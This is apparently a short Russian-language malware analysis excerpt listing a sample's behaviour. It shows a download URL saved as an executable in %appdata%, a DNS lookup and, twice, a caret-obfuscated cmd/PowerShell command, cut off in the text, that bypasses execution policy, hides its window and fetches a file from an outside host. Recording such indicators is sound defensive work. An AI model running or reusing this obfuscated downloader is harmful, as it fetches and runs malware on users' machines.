Техническая информация
- http://www.nnapoakea.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWER^sheLl.Ex^E -^ex^eCutIONPoL^Icy B^yp^AsS ^-^NOproF^iLe -w^i^ndow^sty^lE Hid^d^en ^(^NE^w-^OB^jeCt SYStE^M.^n^eT.wE^bcL^IENt)^.D^Ow^N^LoAdfi^l^E^('http://www.nnapoakea.top...
- DNS ASK nn###akea.top
- '<SYSTEM32>\cmd.exe' /c "pOWER^sheLl.Ex^E -^ex^eCutIONPoL^Icy B^yp^AsS ^-^NOproF^iLe -w^i^ndow^sty^lE Hid^d^en ^(^NE^w-^OB^jeCt SYStE^M.^n^eT.wE^bcL^IENt)^.D^Ow^N^LoAdfi^l^E^('http://www.nnapoakea.top...' (со скрытым окном)